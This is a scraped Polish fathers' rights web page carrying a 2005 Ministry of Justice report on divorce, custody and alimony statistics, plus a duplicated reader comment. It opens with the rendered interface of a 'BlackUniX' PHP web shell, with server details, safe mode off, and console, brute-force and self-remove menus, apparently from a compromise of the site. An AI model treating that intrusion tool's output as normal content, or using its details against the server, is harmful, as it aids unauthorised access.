W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-20 11:08:53
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.198.158.24
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Podstawowe informacje o sprawach o rozwód
28.08.2007.
W latach 2000 do 2004 w sądach okręgowych zanotowano następujące liczby wpływających i załatwionych spraw o rozwód i separację:

Ogólna liczbia małżeństw skonfliktowanych, które spodziewają się rozstrzygnięcia swoich problemów w sądzie wynosiła odpowiedni do lat: ok. 134 tys. w 2000 r. i ok. 200 tys. w 2004 r. Do liczb rozwodów należałoby dodać liczby małoletnich dzieci, zatem w sumie w 2000 r. zjawiskiem negatywnego funkcjonowania rodziny było objętych ok. 300 tys. osób, a w 2004 roku – ok. 440 tys. osób. Dane powyższe są danymi ewidencyjnymi w sądach okręgowych i informują o ogólnej liczbie rejestrowanych spraw, z których część jest wpisywana ponownie, a część zostaje załatwiona formalnie, np. przez odrzucenie z powodu niewpłacenia opłaty sądowej.

Analizując problem należy jednak o powyższym zjawisku pamiętać, ponieważ wskazuje ono na znaczną dynamikę tych spraw. Wpływ na nią mają – poza zwykłymi przyczynami, takimi jak alkoholizm, nieporozumienia rodzinne, niedochowanie wierności małżeńskiej – także koszty wpisów lub zmiany legislacyjne. W 2004 r. 23-procentowy wzrost (a więc znaczny) wystąpił z powodu zmian w pomocy finansowej udzielanej samotnym rodzicom przez Państwo.
Jednocześnie nastąpił znaczny spadek liczby spraw o alimenty – potwierdzając tezę o liczbie
rozwodów z przyczyn finansowych.
O kosztach utrzymania dzieci przez samotnych rodziców mogą świadczyć także wymienione wyżej sprawy o alimenty, których wartość poznawcza jest ograniczona przez brak podziału na płeć powodów (i osób w ich imieniu występujących) i pozwanych. Dodać należy także, iż w sprawach rozwodowych mowa jest o kosztach utrzymania, przyznawaniu władzy rodzicielskiej, o orzeczeniu praw do lokalu mieszkalnego, jednak wyłącznie w odniesieniu do osób małoletnich, a koszty utrzymania (a więc częściowo alimenty)
ponoszone są wobec osób ponadmałoletnich (dorosłych), i tu brak jest informacji o płci rodzica zobowiązanego.
Nie jest także zbierana w podziale na płeć rodziców informacja o władzy rodzicielskiej w sprawach opiekuńczych małoletnich (ok. 160 tys.), rozstrzygnięciach w istotnych sprawach dziecka, ustaleniu miejsca pobytu dziecka, kontaktów z małoletnim, wydania dziecka, itp. Jak z powyższego wynika brak jest kompleksowych badań statystycznych o zjawisku rodzicielstwa i obciążeniach wynikających z podziału na płeć.
Na dołączonych wykresach z zakresu prawomocnie orzeczonych rozwodów przedstawia się informacje wybrane z bogatego zbioru wytworzonego z danych jednostkowych, pochodzących z akt sądowych.
W ciągu prezentowanych pięciu lat nie zachodziła znacząca zmiana w odsetkach rozwodów małżeństw z małoletnimi dziećmi w odniesieniu do ogólnej liczby rozwodów: w 2000 r. było to 64,9%, w 2002 – 63,0% i w 2004 r. – 64,9%.
Zauważa się ponadto co następuje:
zmniejsza się przyznawanie władzy rodzicielskiej wyłącznie matce z 65,7% do 64,4% (w 2004 r.), ojcu z 3,7% (w 2000 r.) do 3,3% (w 2004 r.) oraz „rozdzielnie” dzieci, natomiast wzrasta udział orzeczeń o wspólnym wykonywaniu tej władzy przez oboje rodziców z 29,5% (w 2000 r.) do 31,5% (w 2004 r.). Zauważa się również wzrost udziału rozwodów bez orzeczenia o winie z 67,2% w 2000 r. do 69,8% w 2004 r., a zdecydowane zmniejszenie udziału rozwodów z winy męża z 25,5% do 23,0% w omawianych latach.

Jeśli chodzi o dane za rok 2004 które informują o powierzeniu władzy rodzicielskiej w korelacji z orzeczeniem o winie to zwracają uwagę trzy wartości; pierwsza: przy orzeczeniu o winie męża dziecko powierzono opiece ojca (32 zdarzenia), przy orzeczeniu winy żony dziecko powierzono opiece matki (300 zdarzeń) oraz w każdej sytuacji orzeczenie o winie rozwiedzionych władzę rodzicielską powierzano oddzielnie ojcu i matce (łącznie 323 zdarzenia). Dominującym typem władzy rodzicielskiej jest powierzenie jej matce 23291 zdarzeń, co oznacza 63,7% udziału w ogólnej liczbie władzy rodzicielskiej.
 
W przekroju wojewódzkim, zwraca uwagę dominacja orzeczeń o powierzeniu władzy rodzicielskiej łącznie matce i ojcu w województwach lubelskim, łódzkim, mazowieckim, podkarpackim, podlaskim i warmińsko-mazurskim. Największa liczba orzeczeń o powierzeniu dzieci opiece matki jest w woj. śląskim, dolnośląskim i wielkopolskim (4753, 3632, 2705), a w odniesieniu do razem władzy matki wynosi 20,41%, 15,59% i 11,61%. Najmniejsza natomiast liczba orzeczeń o powierzeniu dzieci opiece ojca występuje w woj. świętokrzyskim (7), łódzkim (24) i lubelskim (29). W odniesieniu do liczby razem władzy ojcowskiej są to znikome udziały: 0,59%, 2,01% i 2,43%.
Ogólny udział powierzania władzy rodzicielskiej w liczbie rozwodów małżeństw z małoletnimi dziećmi w 2004 r. jest następujący: matce powierzono 63,72%, ojcu – 3,27%, matce i ojcu razem 31,14%, oddzielnie matce i ojcu 0,88% oraz orzeczono inne rodzaje opieki – 0,98%.
Interesujące są informacje o powierzeniu władzy rodzicielskiej i średniej wartości orzeczonych alimentów

Ogólna tendencja o wysokości alimentów wykazywała się wzrostem w dość znacznym stopniu od roku 2000 do 2003 aby w 2004 roku zmniejszyć się. Charakterystyczne są wysokości alimentów na rzecz dzieci powierzonych władzy ojców – wzrost z 275 zł do 333 zł w 2003 r.
(o 21%), zmniejszenie (o 5,5%) do 315 zł w 2004 r., natomiast na rzecz dzieci powierzonych władzy matek – wzrost z 382 zł do 447 zł (o 17%) w 2003 r. i zmniejszenie (o 0,7%) do 444 zł w 2004 r.
W kwestii orzekania o mieszkaniu w sprawie rozwodowej zauważyć należy, że  zdecydowanie zmniejszyła się liczba orzeczonych eksmisji męża (o 29%) z 1164 do 833 zdarzeń, na zbliżonym poziomie utrzymywała się liczba eksmisji żony – w granicach 25 do 42 zdarzeń i zmniejszyła się liczba (o 35%) orzeczeń o przyznaniu mieszkania jednemu z małżonków ze 130 do 84 orzeczeń. Liczby te są tak małe, ponieważ w 29 tys. rozwodów nie było podstawy do orzekania o mieszkaniu albowiem małżonkowie nie zajmowali wspólnego lokalu, w 5024 rozwodach sąd nie zajął się tym problemem, a w 1309 „uregulował sposób korzystania z lokalu”, co oznacza ustalenie, który z rozwiedzionych małżonków ma określone
prawo do poszczególnych izb i pomieszczeń mieszkania. W podsumowaniu niniejszego wystąpienia podkreślić pragnę, iż jest to tylko fragmentaryczna prezentacja zdarzeń porównująca zastosowanie prawa wobec rozwiedzionych małżonków uwzględniająca porównanie według płci. Pochodzą one z akt sądowych i zaspokajają podstawową potrzebę informacji o zjawisku o imieniu rozwód. Z akt sądowych
można pozyskać zdecydowanie więcej informacji, o których wspomniałam w części ogólnej, a także pogłębić badania o kontekst społeczny, kulturowy, gospodarczy w przekroju terytorialnym. Wymiar społeczny zjawiska wart jest podjęcia takiej próby.

Warszawa, dnia 21.06.2005 r.
Naczelnik Wydziału Statystyki
Marlena Gi l e w i c z
Naczelnik Wydziału Statystyki
w Departamencie Organizacyjnym
w Ministerstwie Sprawiedliwości

Tabele i wykresy ilustrujące tekst http://www.ms.gov.pl/statystyki/stat_rozwody_2004.pdf
 
« poprzedni artykuł   następny artykuł »

komentarze

JESTEM STRZĘPKIEM NERWÓW.WŁAŚNIE SKOŃCZYŁA SIĘ MOJA SPRAWA ROZWODOWA W KTÓREJ SĄD ORZEKŁ,ŻE CAŁKOWITĄ WINĘ ZA ROZKŁAD ZWIĄZKU PONOSI MĄŻ.DLATEGO ODRZUCIŁ POZEW O ROZWÓD .MOJA SYTUACJA I 2 DZIECI POGORSZYŁABY SIĘ ,PONIEWAŻ ZAMIESZKALIŚMY Z 80 LETNIĄ BABCIĄ MĘŻA I BABCIA PO 13 LATACH OPIEKI NAD NIĄ /JA SIĘ NIĄ OPIEKOWAŁAM / ZAPISAŁA MIESZKANIE TYLKO MĘŻOWI JAKO JEDYNEMU SPADKOBIERCY TERAZ MĄŻ OŻE MNIE I PEŁNOLETNIE DZIECI EKSMITOWAĆ.JA W WIEKU 50 LAT MUSZE IŚĆ POD MOST.NA DODATEK ZRZEKA SIĘ MIESZKANIA NA RZECZ JAKIEJŚ RODZINY! CZY PRAWO POZWOLI MU NA TO ? JEŚLI TAK TO JAK MI SIĘ MA NIEPOGORSZYĆ I MOIM DZIECIOM SKORO PRAWO WŁASNOŚCI JEST ŚWIĘTE.MP Z KRAKOWA

Napisał MARIA, dzień 11/26/2007 o 14:46

JESTEM STRZĘPKIEM NERWÓW.WŁAŚNIE SKOŃCZYŁA SIĘ MOJA SPRAWA ROZWODOWA W KTÓREJ SĄD ORZEKŁ,ŻE CAŁKOWITĄ WINĘ ZA ROZKŁAD ZWIĄZKU PONOSI MĄŻ.DLATEGO ODRZUCIŁ POZEW O ROZWÓD .MOJA SYTUACJA I 2 DZIECI POGORSZYŁABY SIĘ ,PONIEWAŻ ZAMIESZKALIŚMY Z 80 LETNIĄ BABCIĄ MĘŻA I BABCIA PO 13 LATACH OPIEKI NAD NIĄ /JA SIĘ NIĄ OPIEKOWAŁAM / ZAPISAŁA MIESZKANIE TYLKO MĘŻOWI JAKO JEDYNEMU SPADKOBIERCY TERAZ MĄŻ OŻE MNIE I PEŁNOLETNIE DZIECI EKSMITOWAĆ.JA W WIEKU 50 LAT MUSZE IŚĆ POD MOST.NA DODATEK ZRZEKA SIĘ MIESZKANIA NA RZECZ JAKIEJŚ RODZINY! CZY PRAWO POZWOLI MU NA TO ? JEŚLI TAK TO JAK MI SIĘ MA NIEPOGORSZYĆ I MOIM DZIECIOM SKORO PRAWO WŁASNOŚCI JEST ŚWIĘTE.MP Z KRAKOWA

Napisał MARIA, dzień 11/26/2007 o 14:46

 1 
Strona 1 z 1 ( 2 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


20.06.2018.